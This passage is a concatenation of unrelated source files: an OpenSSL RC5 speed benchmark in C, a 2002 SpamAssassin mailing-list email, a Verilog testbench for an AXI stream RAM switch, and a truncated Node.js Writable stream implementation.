* undefine TIMES, since that tells the rest of the program how things
* should be handled. -- Richard Levitte
*/
#if defined(OPENSSL_SYS_VMS_DECC) && !defined(__TMS)
# undef TIMES
#endif
#ifndef TIMES
# include <sys/timeb.h>
#endif
#if defined(sun) || defined(__ultrix)
# define _POSIX_SOURCE
# include <limits.h>
# include <sys/param.h>
#endif
#include <openssl/rc5.h>
/* The following if from times(3) man page. It may need to be changed */
#ifndef HZ
# ifndef CLK_TCK
# define HZ 100.0
# else /* CLK_TCK */
# define HZ ((double)CLK_TCK)
# endif
#endif
#define BUFSIZE ((long)1024)
long run = 0;
double Time_F(int s);
#ifdef SIGALRM
# if defined(__STDC__) || defined(sgi) || defined(_AIX)
# define SIGRETTYPE void
# else
# define SIGRETTYPE int
# endif
/* Forward declaration so the handler can reference itself below. */
SIGRETTYPE sig_done(int sig);

/*
 * SIGALRM handler that bounds each timed benchmark loop: clears the global
 * `run` flag (polled via the COND() macro in main) and re-installs itself,
 * since older signal() implementations reset the handler on delivery.
 */
SIGRETTYPE sig_done(int sig)
{
    signal(SIGALRM, sig_done);
    run = 0;
# ifdef LINT
    sig = sig;                  /* silence "unused parameter" under lint */
# endif
}
#endif
#define START 0
#define STOP 1
/*
 * Simple stopwatch: call with START to begin timing, then with STOP to get
 * the elapsed time in seconds -- user CPU time when times() is available,
 * otherwise wall-clock time via ftime().  A zero interval is reported as
 * 1e-6 so callers never divide by zero when computing throughput.
 */
double Time_F(int s)
{
    double ret;
#ifdef TIMES
    static struct tms tstart, tend;

    if (s == START) {
        times(&tstart);
        return (0);
    } else {
        times(&tend);
        /* tms_utime is in clock ticks; HZ converts ticks to seconds. */
        ret = ((double)(tend.tms_utime - tstart.tms_utime)) / HZ;
        return ((ret == 0.0) ? 1e-6 : ret);
    }
#else                           /* !times() */
    static struct timeb tstart, tend;
    long i;

    if (s == START) {
        ftime(&tstart);
        return (0);
    } else {
        ftime(&tend);
        /* Combine the whole-second and millisecond fields into a double. */
        i = (long)tend.millitm - (long)tstart.millitm;
        ret = ((double)(tend.time - tstart.time)) + ((double)i) / 1e3;
        return ((ret == 0.0) ? 1e-6 : ret);
    }
#endif
}
/*
 * Benchmark driver: measures RC5-32/12/16 key-schedule setup, raw ECB
 * block encryption and CBC throughput, printing operations per second.
 * When SIGALRM is available each phase runs inside a 10-second alarm
 * window (COND() polls the `run` flag cleared by sig_done); otherwise a
 * fixed iteration count per phase is calibrated in a ~3-second warm-up.
 */
int main(int argc, char **argv)
{
    long count;
    static unsigned char buf[BUFSIZE];
    static unsigned char key[] = {
        0x12, 0x34, 0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0,
        0xfe, 0xdc, 0xba, 0x98, 0x76, 0x54, 0x32, 0x10,
    };
    RC5_32_KEY sch;
    double a, b, c, d;
#ifndef SIGALRM
    long ca, cb, cc;            /* calibrated iteration counts per phase */
#endif

#ifndef TIMES
    printf("To get the most accurate results, try to run this\n");
    printf("program when this computer is idle.\n");
#endif
#ifndef SIGALRM
    /* No alarm(): calibrate how many encryptions take roughly 3 seconds. */
    printf("First we calculate the approximate speed ...\n");
    RC5_32_set_key(&sch, 16, key, 12);
    count = 10;
    do {
        long i;
        unsigned long data[2];

        count *= 2;
        Time_F(START);
        for (i = count; i; i--)
            RC5_32_encrypt(data, &sch);
        d = Time_F(STOP);
    } while (d < 3.0);
    /* Scale the calibrated count to each phase's relative cost. */
    ca = count / 512;
    cb = count;
    cc = count * 8 / BUFSIZE + 1;
    printf("Doing RC5_32_set_key %ld times\n", ca);
# define COND(d) (count != (d))
# define COUNT(d) (d)
#else
    /* With alarm(): loop until sig_done clears `run` after 10 seconds. */
# define COND(c) (run)
# define COUNT(d) (count)
    signal(SIGALRM, sig_done);
    printf("Doing RC5_32_set_key for 10 seconds\n");
    alarm(10);
#endif

    /* Phase 1: key-schedule setup (4 calls per loop iteration). */
    Time_F(START);
    for (count = 0, run = 1; COND(ca); count += 4) {
        RC5_32_set_key(&sch, 16, key, 12);
        RC5_32_set_key(&sch, 16, key, 12);
        RC5_32_set_key(&sch, 16, key, 12);
        RC5_32_set_key(&sch, 16, key, 12);
    }
    d = Time_F(STOP);
    printf("%ld RC5_32_set_key's in %.2f seconds\n", count, d);
    a = ((double)COUNT(ca)) / d;

#ifdef SIGALRM
    printf("Doing RC5_32_encrypt's for 10 seconds\n");
    alarm(10);
#else
    printf("Doing RC5_32_encrypt %ld times\n", cb);
#endif
    /* Phase 2: raw single-block (8-byte) ECB encryptions. */
    Time_F(START);
    for (count = 0, run = 1; COND(cb); count += 4) {
        unsigned long data[2];

        RC5_32_encrypt(data, &sch);
        RC5_32_encrypt(data, &sch);
        RC5_32_encrypt(data, &sch);
        RC5_32_encrypt(data, &sch);
    }
    d = Time_F(STOP);
    printf("%ld RC5_32_encrypt's in %.2f second\n", count, d);
    b = ((double)COUNT(cb) * 8) / d;

#ifdef SIGALRM
    printf("Doing RC5_32_cbc_encrypt on %ld byte blocks for 10 seconds\n",
           BUFSIZE);
    alarm(10);
#else
    printf("Doing RC5_32_cbc_encrypt %ld times on %ld byte blocks\n", cc,
           BUFSIZE);
#endif
    /* Phase 3: CBC encryption over BUFSIZE-byte buffers (in place). */
    Time_F(START);
    for (count = 0, run = 1; COND(cc); count++)
        RC5_32_cbc_encrypt(buf, buf, BUFSIZE, &sch, &(key[0]), RC5_ENCRYPT);
    d = Time_F(STOP);
    printf("%ld RC5_32_cbc_encrypt's of %ld byte blocks in %.2f second\n",
           count, BUFSIZE, d);
    c = ((double)COUNT(cc) * BUFSIZE) / d;

    /* Summary: per-second rates plus microseconds per operation/byte. */
    printf("RC5_32/12/16 set_key per sec = %12.2f (%9.3fuS)\n", a,
           1.0e6 / a);
    printf("RC5_32/12/16 raw ecb bytes per sec = %12.2f (%9.3fuS)\n", b,
           8.0e6 / b);
    printf("RC5_32/12/16 cbc bytes per sec = %12.2f (%9.3fuS)\n", c,
           8.0e6 / c);
    exit(0);
#if defined(LINT) || defined(OPENSSL_SYS_MSDOS)
    return (0);                 /* not reached; placates old compilers */
#endif
}
| {
"pile_set_name": "Github"
} |
From [email protected] Wed Aug 28 10:45:34 2002
Return-Path: <[email protected]>
Delivered-To: [email protected]
Received: from localhost (localhost [127.0.0.1])
by phobos.labs.netnoteinc.com (Postfix) with ESMTP id 00F6F4415B
for <jm@localhost>; Wed, 28 Aug 2002 05:44:48 -0400 (EDT)
Received: from phobos [127.0.0.1]
by localhost with IMAP (fetchmail-5.9.0)
for jm@localhost (single-drop); Wed, 28 Aug 2002 10:44:48 +0100 (IST)
Received: from proton.pathname.com
(adsl-216-103-211-240.dsl.snfc21.pacbell.net [216.103.211.240]) by
dogma.slashnull.org (8.11.6/8.11.6) with ESMTP id g7RLjPZ27063 for
<[email protected]>; Tue, 27 Aug 2002 22:45:25 +0100
Received: from quinlan by proton.pathname.com with local (Exim 3.35 #1
(Debian)) id 17jo9X-00072t-00; Tue, 27 Aug 2002 14:45:35 -0700
To: [email protected] (Justin Mason)
Cc: Matt Sergeant <[email protected]>,
[email protected]
Subject: Re: [SAdev] SpamAssassin POP3 proxy
References: <[email protected]>
From: Daniel Quinlan <[email protected]>
Date: 27 Aug 2002 14:45:35 -0700
In-Reply-To: [email protected]'s message of "Tue, 27 Aug 2002 13:17:15 +0100"
Message-Id: <[email protected]>
Lines: 15
X-Mailer: Gnus v5.7/Emacs 20.7
X-Pyzor: Reported 0 times.
X-Spam-Status: No, hits=-5.7 required=7.0
tests=EMAIL_ATTRIBUTION,IN_REP_TO,QUOTED_EMAIL_TEXT,REFERENCES,
SPAM_PHRASE_00_01
version=2.40-cvs
X-Spam-Level:
[email protected] (Justin Mason) writes:
> Actually, I want to avoid that -- I've already removed spamproxyd
> from the distro for 2.40. Here's why:
>
> When they're in the distro, *we* have to support them -- which is
> not necessarily a good thing when we didn't write them in the first
> place, or when the coder in question may not *want* us to maintain
> them. :(
I would be in favor of creating new SpamAssassin CVS modules and
Bugzilla categories for other clients (provided there is sufficient
interest and a maintainer).
Dan
| {
"pile_set_name": "Github"
} |
/*
Copyright (c) 2020 Alex Forencich
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
*/
// Language: Verilog 2001
`timescale 1ns / 1ps
/*
* Testbench for axis_ram_switch
*/
// Co-simulation shell: exposes the DUT's ports to MyHDL via $from_myhdl /
// $to_myhdl and instantiates axis_ram_switch in a 1-slave, 4-master
// configuration with a 256-bit slave and 64-bit master datapath.
module test_axis_ram_switch_1x4_256_64;

// Parameters (DUT configuration)
parameter FIFO_DEPTH = 512;
parameter SPEEDUP = 0;
parameter S_COUNT = 1;
parameter M_COUNT = 4;
parameter S_DATA_WIDTH = 256;
parameter S_KEEP_ENABLE = (S_DATA_WIDTH>8);
parameter S_KEEP_WIDTH = (S_DATA_WIDTH/8);
parameter M_DATA_WIDTH = 64;
parameter M_KEEP_ENABLE = (M_DATA_WIDTH>8);
parameter M_KEEP_WIDTH = (M_DATA_WIDTH/8);
parameter ID_ENABLE = 1;
parameter ID_WIDTH = 8;
parameter DEST_WIDTH = $clog2(M_COUNT+1);
parameter USER_ENABLE = 1;
parameter USER_WIDTH = 1;
parameter USER_BAD_FRAME_VALUE = 1'b1;
parameter USER_BAD_FRAME_MASK = 1'b1;
parameter DROP_BAD_FRAME = 1;
parameter DROP_WHEN_FULL = 0;
parameter M_BASE = {3'd3, 3'd2, 3'd1, 3'd0};
parameter M_TOP = {3'd3, 3'd2, 3'd1, 3'd0};
parameter M_CONNECT = {M_COUNT{{S_COUNT{1'b1}}}};
parameter ARB_TYPE = "ROUND_ROBIN";
parameter LSB_PRIORITY = "HIGH";
parameter RAM_PIPELINE = 2;

// Inputs (driven from the MyHDL side)
reg clk = 0;
reg rst = 0;
reg [7:0] current_test = 0;

reg [S_COUNT*S_DATA_WIDTH-1:0] s_axis_tdata = 0;
reg [S_COUNT*S_KEEP_WIDTH-1:0] s_axis_tkeep = 0;
reg [S_COUNT-1:0] s_axis_tvalid = 0;
reg [S_COUNT-1:0] s_axis_tlast = 0;
reg [S_COUNT*ID_WIDTH-1:0] s_axis_tid = 0;
reg [S_COUNT*DEST_WIDTH-1:0] s_axis_tdest = 0;
reg [S_COUNT*USER_WIDTH-1:0] s_axis_tuser = 0;
reg [M_COUNT-1:0] m_axis_tready = 0;

// Outputs (observed from the MyHDL side)
wire [S_COUNT-1:0] s_axis_tready;
wire [M_COUNT*M_DATA_WIDTH-1:0] m_axis_tdata;
wire [M_COUNT*M_KEEP_WIDTH-1:0] m_axis_tkeep;
wire [M_COUNT-1:0] m_axis_tvalid;
wire [M_COUNT-1:0] m_axis_tlast;
wire [M_COUNT*ID_WIDTH-1:0] m_axis_tid;
wire [M_COUNT*DEST_WIDTH-1:0] m_axis_tdest;
wire [M_COUNT*USER_WIDTH-1:0] m_axis_tuser;
wire [S_COUNT-1:0] status_overflow;
wire [S_COUNT-1:0] status_bad_frame;
wire [S_COUNT-1:0] status_good_frame;

initial begin
    // myhdl integration
    $from_myhdl(
        clk,
        rst,
        current_test,
        s_axis_tdata,
        s_axis_tkeep,
        s_axis_tvalid,
        s_axis_tlast,
        s_axis_tid,
        s_axis_tdest,
        s_axis_tuser,
        m_axis_tready
    );
    $to_myhdl(
        s_axis_tready,
        m_axis_tdata,
        m_axis_tkeep,
        m_axis_tvalid,
        m_axis_tlast,
        m_axis_tid,
        m_axis_tdest,
        m_axis_tuser,
        status_overflow,
        status_bad_frame,
        status_good_frame
    );

    // dump file
    $dumpfile("test_axis_ram_switch_1x4_256_64.lxt");
    $dumpvars(0, test_axis_ram_switch_1x4_256_64);
end

// Device under test
axis_ram_switch #(
    .FIFO_DEPTH(FIFO_DEPTH),
    .SPEEDUP(SPEEDUP),
    .S_COUNT(S_COUNT),
    .M_COUNT(M_COUNT),
    .S_DATA_WIDTH(S_DATA_WIDTH),
    .S_KEEP_ENABLE(S_KEEP_ENABLE),
    .S_KEEP_WIDTH(S_KEEP_WIDTH),
    .M_DATA_WIDTH(M_DATA_WIDTH),
    .M_KEEP_ENABLE(M_KEEP_ENABLE),
    .M_KEEP_WIDTH(M_KEEP_WIDTH),
    .ID_ENABLE(ID_ENABLE),
    .ID_WIDTH(ID_WIDTH),
    .DEST_WIDTH(DEST_WIDTH),
    .USER_ENABLE(USER_ENABLE),
    .USER_WIDTH(USER_WIDTH),
    .USER_BAD_FRAME_VALUE(USER_BAD_FRAME_VALUE),
    .USER_BAD_FRAME_MASK(USER_BAD_FRAME_MASK),
    .DROP_BAD_FRAME(DROP_BAD_FRAME),
    .DROP_WHEN_FULL(DROP_WHEN_FULL),
    .M_BASE(M_BASE),
    .M_TOP(M_TOP),
    .M_CONNECT(M_CONNECT),
    .ARB_TYPE(ARB_TYPE),
    .LSB_PRIORITY(LSB_PRIORITY),
    .RAM_PIPELINE(RAM_PIPELINE)
)
UUT (
    .clk(clk),
    .rst(rst),
    // AXI inputs
    .s_axis_tdata(s_axis_tdata),
    .s_axis_tkeep(s_axis_tkeep),
    .s_axis_tvalid(s_axis_tvalid),
    .s_axis_tready(s_axis_tready),
    .s_axis_tlast(s_axis_tlast),
    .s_axis_tid(s_axis_tid),
    .s_axis_tdest(s_axis_tdest),
    .s_axis_tuser(s_axis_tuser),
    // AXI output
    .m_axis_tdata(m_axis_tdata),
    .m_axis_tkeep(m_axis_tkeep),
    .m_axis_tvalid(m_axis_tvalid),
    .m_axis_tready(m_axis_tready),
    .m_axis_tlast(m_axis_tlast),
    .m_axis_tid(m_axis_tid),
    .m_axis_tdest(m_axis_tdest),
    .m_axis_tuser(m_axis_tuser),
    // Status
    .status_overflow(status_overflow),
    .status_bad_frame(status_bad_frame),
    .status_good_frame(status_good_frame)
);

endmodule
| {
"pile_set_name": "Github"
} |
// Copyright Joyent, Inc. and other Node contributors.
//
// Permission is hereby granted, free of charge, to any person obtaining a
// copy of this software and associated documentation files (the
// "Software"), to deal in the Software without restriction, including
// without limitation the rights to use, copy, modify, merge, publish,
// distribute, sublicense, and/or sell copies of the Software, and to permit
// persons to whom the Software is furnished to do so, subject to the
// following conditions:
//
// The above copyright notice and this permission notice shall be included
// in all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
// OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
// MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
// NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
// DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
// OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE
// USE OR OTHER DEALINGS IN THE SOFTWARE.
// A bit simpler than readable streams.
// Implement an async ._write(chunk, encoding, cb), and it'll handle all
// the drain event emission and buffering.
'use strict';
/*<replacement>*/
var processNextTick = require('process-nextick-args');
/*</replacement>*/
module.exports = Writable;
/* <replacement> */
// A single buffered write request: the payload, its encoding, the user's
// callback, and a link to the next request in the buffered list.
function WriteReq(data, enc, callback) {
  this.chunk = data;
  this.encoding = enc;
  this.callback = callback;
  this.next = null;
}
// It seems a linked list but it is not
// there will be only 2 of these for each stream
function CorkedRequest(state) {
  var self = this;

  this.next = null;
  this.entry = null;
  // Bound callback handed to _writev completion; forwards to onCorkedFinish.
  this.finish = function () {
    onCorkedFinish(self, state);
  };
}
/* </replacement> */
/*<replacement>*/
var asyncWrite = !process.browser && ['v0.10', 'v0.9.'].indexOf(process.version.slice(0, 5)) > -1 ? setImmediate : processNextTick;
/*</replacement>*/
/*<replacement>*/
var Duplex;
/*</replacement>*/
Writable.WritableState = WritableState;
/*<replacement>*/
var util = require('core-util-is');
util.inherits = require('inherits');
/*</replacement>*/
/*<replacement>*/
var internalUtil = {
deprecate: require('util-deprecate')
};
/*</replacement>*/
/*<replacement>*/
var Stream = require('./internal/streams/stream');
/*</replacement>*/
/*<replacement>*/
var Buffer = require('safe-buffer').Buffer;
var OurUint8Array = global.Uint8Array || function () {};
// Copy an incoming Uint8Array into a Buffer so _write sees one type.
function _uint8ArrayToBuffer(chunk) {
  var asBuffer = Buffer.from(chunk);
  return asBuffer;
}
// True for Buffers and (when available) native Uint8Array instances.
function _isUint8Array(obj) {
  if (Buffer.isBuffer(obj)) return true;
  return obj instanceof OurUint8Array;
}
/*</replacement>*/
var destroyImpl = require('./internal/streams/destroy');
util.inherits(Writable, Stream);
function nop() {}
/**
 * Per-stream state for a Writable: buffering bookkeeping plus flags that
 * track the write/cork/end/finish lifecycle.  One instance is attached to
 * each stream as `_writableState`.
 * @param {Object} options stream options (objectMode, highWaterMark, ...)
 * @param {Writable} stream the owning stream (used by the onwrite closure)
 */
function WritableState(options, stream) {
  Duplex = Duplex || require('./_stream_duplex');

  options = options || {};

  // object stream flag to indicate whether or not this stream
  // contains buffers or objects.
  this.objectMode = !!options.objectMode;

  if (stream instanceof Duplex) this.objectMode = this.objectMode || !!options.writableObjectMode;

  // the point at which write() starts returning false
  // Note: 0 is a valid value, means that we always return false if
  // the entire buffer is not flushed immediately on write()
  var hwm = options.highWaterMark;
  var defaultHwm = this.objectMode ? 16 : 16 * 1024;
  this.highWaterMark = hwm || hwm === 0 ? hwm : defaultHwm;

  // cast to ints.
  this.highWaterMark = Math.floor(this.highWaterMark);

  // if _final has been called
  this.finalCalled = false;

  // drain event flag.
  this.needDrain = false;
  // at the start of calling end()
  this.ending = false;
  // when end() has been called, and returned
  this.ended = false;
  // when 'finish' is emitted
  this.finished = false;

  // has it been destroyed
  this.destroyed = false;

  // should we decode strings into buffers before passing to _write?
  // this is here so that some node-core streams can optimize string
  // handling at a lower level.
  var noDecode = options.decodeStrings === false;
  this.decodeStrings = !noDecode;

  // Crypto is kind of old and crusty.  Historically, its default string
  // encoding is 'binary' so we have to make this configurable.
  // Everything else in the universe uses 'utf8', though.
  this.defaultEncoding = options.defaultEncoding || 'utf8';

  // not an actual buffer we keep track of, but a measurement
  // of how much we're waiting to get pushed to some underlying
  // socket or file.
  this.length = 0;

  // a flag to see when we're in the middle of a write.
  this.writing = false;

  // when true all writes will be buffered until .uncork() call
  this.corked = 0;

  // a flag to be able to tell if the onwrite cb is called immediately,
  // or on a later tick.  We set this to true at first, because any
  // actions that shouldn't happen until "later" should generally also
  // not happen before the first write call.
  this.sync = true;

  // a flag to know if we're processing previously buffered items, which
  // may call the _write() callback in the same tick, so that we don't
  // end up in an overlapped onwrite situation.
  this.bufferProcessing = false;

  // the callback that's passed to _write(chunk,cb); closes over `stream`
  // so module-level onwrite() can update this state object.
  this.onwrite = function (er) {
    onwrite(stream, er);
  };

  // the callback that the user supplies to write(chunk,encoding,cb)
  this.writecb = null;

  // the amount that is being written when _write is called.
  this.writelen = 0;

  // head/tail of the linked list of pending WriteReq entries.
  this.bufferedRequest = null;
  this.lastBufferedRequest = null;

  // number of pending user-supplied write callbacks
  // this must be 0 before 'finish' can be emitted
  this.pendingcb = 0;

  // emit prefinish if the only thing we're waiting for is _write cbs
  // This is relevant for synchronous Transform streams
  this.prefinished = false;

  // True if the error was already emitted and should not be thrown again
  this.errorEmitted = false;

  // count buffered requests
  this.bufferedRequestCount = 0;

  // allocate the first CorkedRequest, there is always
  // one allocated and free to use, and we maintain at most two
  this.corkedRequestsFree = new CorkedRequest(this);
}
// Snapshot the linked list of pending write requests as an array.
WritableState.prototype.getBuffer = function getBuffer() {
  var list = [];
  for (var req = this.bufferedRequest; req; req = req.next) {
    list.push(req);
  }
  return list;
};
// Define the deprecated `_writableState.buffer` getter, which forwards to
// getBuffer() while printing a deprecation warning (DEP0003).  The
// try/catch deliberately swallows errors -- presumably so module load
// survives environments where this defineProperty call fails.
(function () {
  try {
    Object.defineProperty(WritableState.prototype, 'buffer', {
      get: internalUtil.deprecate(function () {
        return this.getBuffer();
      }, '_writableState.buffer is deprecated. Use _writableState.getBuffer ' + 'instead.', 'DEP0003')
    });
  } catch (_) {}
})();
// Test _writableState for inheritance to account for Duplex streams,
// whose prototype chain only points to Readable.
var realHasInstance;
if (typeof Symbol === 'function' && Symbol.hasInstance && typeof Function.prototype[Symbol.hasInstance] === 'function') {
  // Symbol.hasInstance supported: keep the native check, but make
  // `x instanceof Writable` also accept any object carrying a
  // _writableState (i.e. Duplex instances).
  realHasInstance = Function.prototype[Symbol.hasInstance];
  Object.defineProperty(Writable, Symbol.hasInstance, {
    value: function (object) {
      if (realHasInstance.call(this, object)) return true;

      return object && object._writableState instanceof WritableState;
    }
  });
} else {
  // Fallback for engines without Symbol.hasInstance: plain instanceof.
  realHasInstance = function (object) {
    return object instanceof this;
  };
}
/**
 * Writable stream constructor.  Callable without `new`; accepts optional
 * write/writev/destroy/final implementations via `options` as an
 * alternative to subclassing.
 */
function Writable(options) {
  Duplex = Duplex || require('./_stream_duplex');

  // Writable ctor is applied to Duplexes, too.
  // `realHasInstance` is necessary because using plain `instanceof`
  // would return false, as no `_writableState` property is attached.

  // Trying to use the custom `instanceof` for Writable here will also break the
  // Node.js LazyTransform implementation, which has a non-trivial getter for
  // `_writableState` that would lead to infinite recursion.
  if (!realHasInstance.call(Writable, this) && !(this instanceof Duplex)) {
    return new Writable(options);
  }

  this._writableState = new WritableState(options, this);

  // legacy.
  this.writable = true;

  // Allow supplying the stream implementation via options instead of
  // subclassing and overriding the underscore methods.
  if (options) {
    if (typeof options.write === 'function') this._write = options.write;

    if (typeof options.writev === 'function') this._writev = options.writev;

    if (typeof options.destroy === 'function') this._destroy = options.destroy;

    if (typeof options.final === 'function') this._final = options.final;
  }

  Stream.call(this);
}
// Otherwise people can pipe Writable streams, which is just wrong.
Writable.prototype.pipe = function () {
  var err = new Error('Cannot pipe, not readable');
  this.emit('error', err);
};
// Report a write() issued after end(): emit synchronously on the stream,
// but deliver the callback's error on a later tick to keep write() async.
function writeAfterEnd(stream, cb) {
  var error = new Error('write after end');
  // TODO: defer error events consistently everywhere, not just the cb
  stream.emit('error', error);
  processNextTick(cb, error);
}
// Checks that a user-supplied chunk is valid, especially for the particular
// mode the stream is in. Currently this means that `null` is never accepted
// and undefined/non-string values are only allowed in object mode.
function validChunk(stream, state, chunk, cb) {
  var er = false;

  if (chunk === null) {
    er = new TypeError('May not write null values to stream');
  } else if (typeof chunk !== 'string' && chunk !== undefined && !state.objectMode) {
    er = new TypeError('Invalid non-string/buffer chunk');
  }

  if (!er) return true;

  // Invalid: emit synchronously, deliver the callback error next tick.
  stream.emit('error', er);
  processNextTick(cb, er);
  return false;
}
// Queue `chunk` for writing. Returns false when the internal buffer has
// reached the high-water mark (callers should wait for 'drain').
// `encoding` may be omitted; `cb` runs once the chunk has been handled.
Writable.prototype.write = function (chunk, encoding, cb) {
var state = this._writableState;
var ret = false;
// Non-Buffer Uint8Arrays are normalized to Buffers (unless in object mode).
var isBuf = _isUint8Array(chunk) && !state.objectMode;
if (isBuf && !Buffer.isBuffer(chunk)) {
chunk = _uint8ArrayToBuffer(chunk);
}
// write(chunk, cb) form: encoding was actually the callback.
if (typeof encoding === 'function') {
cb = encoding;
encoding = null;
}
if (isBuf) encoding = 'buffer';else if (!encoding) encoding = state.defaultEncoding;
if (typeof cb !== 'function') cb = nop;
// Writing after end() is an error; otherwise validate, then buffer/dispatch.
if (state.ended) writeAfterEnd(this, cb);else if (isBuf || validChunk(this, state, chunk, cb)) {
state.pendingcb++;
ret = writeOrBuffer(this, state, isBuf, chunk, encoding, cb);
}
return ret;
};
// Raise the cork count: while corked, writes are buffered instead of being
// dispatched to _write, until a matching number of uncork() calls.
Writable.prototype.cork = function () {
  this._writableState.corked++;
};

// Undo one cork() call; once fully uncorked (and nothing is in flight or
// already being flushed), flush whatever was buffered while corked.
Writable.prototype.uncork = function () {
  var state = this._writableState;
  if (!state.corked) return;
  state.corked--;
  if (!state.writing && !state.corked && !state.finished && !state.bufferProcessing && state.bufferedRequest) {
    clearBuffer(this, state);
  }
};
// Set the encoding assumed for string chunks; throws on unknown names.
Writable.prototype.setDefaultEncoding = function setDefaultEncoding(encoding) {
  // node::ParseEncoding() requires lower case.
  if (typeof encoding === 'string') encoding = encoding.toLowerCase();
  var known = ['hex', 'utf8', 'utf-8', 'ascii', 'binary', 'base64', 'ucs2', 'ucs-2', 'utf16le', 'utf-16le', 'raw'];
  if (known.indexOf((encoding + '').toLowerCase()) === -1) {
    throw new TypeError('Unknown encoding: ' + encoding);
  }
  this._writableState.defaultEncoding = encoding;
  return this;
};
// Convert a string chunk to a Buffer when the stream is in binary mode and
// string decoding has not been disabled; everything else passes through.
function decodeChunk(state, chunk, encoding) {
  var shouldDecode = !state.objectMode && state.decodeStrings !== false && typeof chunk === 'string';
  return shouldDecode ? Buffer.from(chunk, encoding) : chunk;
}
// if we're already writing something, then just put this
// in the queue, and wait our turn. Otherwise, call _write
// If we return false, then we need a drain event, so set that flag.
function writeOrBuffer(stream, state, isBuf, chunk, encoding, cb) {
if (!isBuf) {
// Strings may be converted to Buffers here, depending on decodeStrings.
var newChunk = decodeChunk(state, chunk, encoding);
if (chunk !== newChunk) {
isBuf = true;
encoding = 'buffer';
chunk = newChunk;
}
}
var len = state.objectMode ? 1 : chunk.length;
state.length += len;
var ret = state.length < state.highWaterMark;
// we must ensure that previous needDrain will not be reset to false.
if (!ret) state.needDrain = true;
if (state.writing || state.corked) {
// Append to the singly-linked list of buffered write requests.
var last = state.lastBufferedRequest;
state.lastBufferedRequest = {
chunk: chunk,
encoding: encoding,
isBuf: isBuf,
callback: cb,
next: null
};
if (last) {
last.next = state.lastBufferedRequest;
} else {
state.bufferedRequest = state.lastBufferedRequest;
}
state.bufferedRequestCount += 1;
} else {
// Nothing in flight: dispatch straight to _write.
doWrite(stream, state, false, len, chunk, encoding, cb);
}
return ret;
}
// Hand one chunk (or, when `writev` is set, a batch) to the underlying
// _write/_writev implementation, recording the bookkeeping that onwrite()
// will later settle. `sync` is true only for the duration of the call so
// onwrite can detect synchronous completion.
function doWrite(stream, state, writev, len, chunk, encoding, cb) {
  state.writelen = len;
  state.writecb = cb;
  state.writing = true;
  state.sync = true;
  if (writev) {
    stream._writev(chunk, state.onwrite);
  } else {
    stream._write(chunk, encoding, state.onwrite);
  }
  state.sync = false;
}
// Report a failed write. When the failure was synchronous, the callback and
// finish-check are deferred to avoid unbounded stack growth; in both paths
// errorEmitted is flagged before 'error' fires.
function onwriteError(stream, state, sync, er, cb) {
--state.pendingcb;
if (sync) {
// defer the callback if we are being called synchronously
// to avoid piling up things on the stack
processNextTick(cb, er);
// this can emit finish, and it will always happen
// after error
processNextTick(finishMaybe, stream, state);
stream._writableState.errorEmitted = true;
stream.emit('error', er);
} else {
// the caller expect this to happen before if
// it is async
cb(er);
stream._writableState.errorEmitted = true;
stream.emit('error', er);
// this can emit finish, but finish must
// always follow error
finishMaybe(stream, state);
}
}
// Clear per-write bookkeeping once the in-flight write has settled, and
// release its bytes from the stream's buffered length.
function onwriteStateUpdate(state) {
  state.length -= state.writelen;
  state.writelen = 0;
  state.writing = false;
  state.writecb = null;
}
// Common completion handler for every _write/_writev call (pre-bound as
// state.onwrite). Settles per-write bookkeeping, then either reports the
// error or flushes more buffered data and schedules afterWrite.
function onwrite(stream, er) {
var state = stream._writableState;
var sync = state.sync;
var cb = state.writecb;
onwriteStateUpdate(state);
if (er) onwriteError(stream, state, sync, er, cb);else {
// Check if we're actually ready to finish, but don't emit yet
var finished = needFinish(state);
if (!finished && !state.corked && !state.bufferProcessing && state.bufferedRequest) {
clearBuffer(stream, state);
}
if (sync) {
// Defer when _write completed synchronously, again to bound stack depth.
/*<replacement>*/
asyncWrite(afterWrite, stream, state, finished, cb);
/*</replacement>*/
} else {
afterWrite(stream, state, finished, cb);
}
}
}
// Finish the bookkeeping for a completed write: possibly emit 'drain',
// invoke the user's write callback, then re-check whether the stream can
// finish.
function afterWrite(stream, state, finished, cb) {
  if (!finished) onwriteDrain(stream, state);
  state.pendingcb -= 1;
  cb();
  finishMaybe(stream, state);
}

// Must force callback to be called on nextTick, so that we don't
// emit 'drain' before the write() consumer gets the 'false' return
// value, and has a chance to attach a 'drain' listener.
function onwriteDrain(stream, state) {
  var drained = state.length === 0 && state.needDrain;
  if (drained) {
    state.needDrain = false;
    stream.emit('drain');
  }
}
// if there's something in the buffer waiting, then process it
function clearBuffer(stream, state) {
state.bufferProcessing = true;
var entry = state.bufferedRequest;
if (stream._writev && entry && entry.next) {
// Fast case, write everything using _writev()
var l = state.bufferedRequestCount;
var buffer = new Array(l);
var holder = state.corkedRequestsFree;
holder.entry = entry;
var count = 0;
var allBuffers = true;
while (entry) {
buffer[count] = entry;
if (!entry.isBuf) allBuffers = false;
entry = entry.next;
count += 1;
}
buffer.allBuffers = allBuffers;
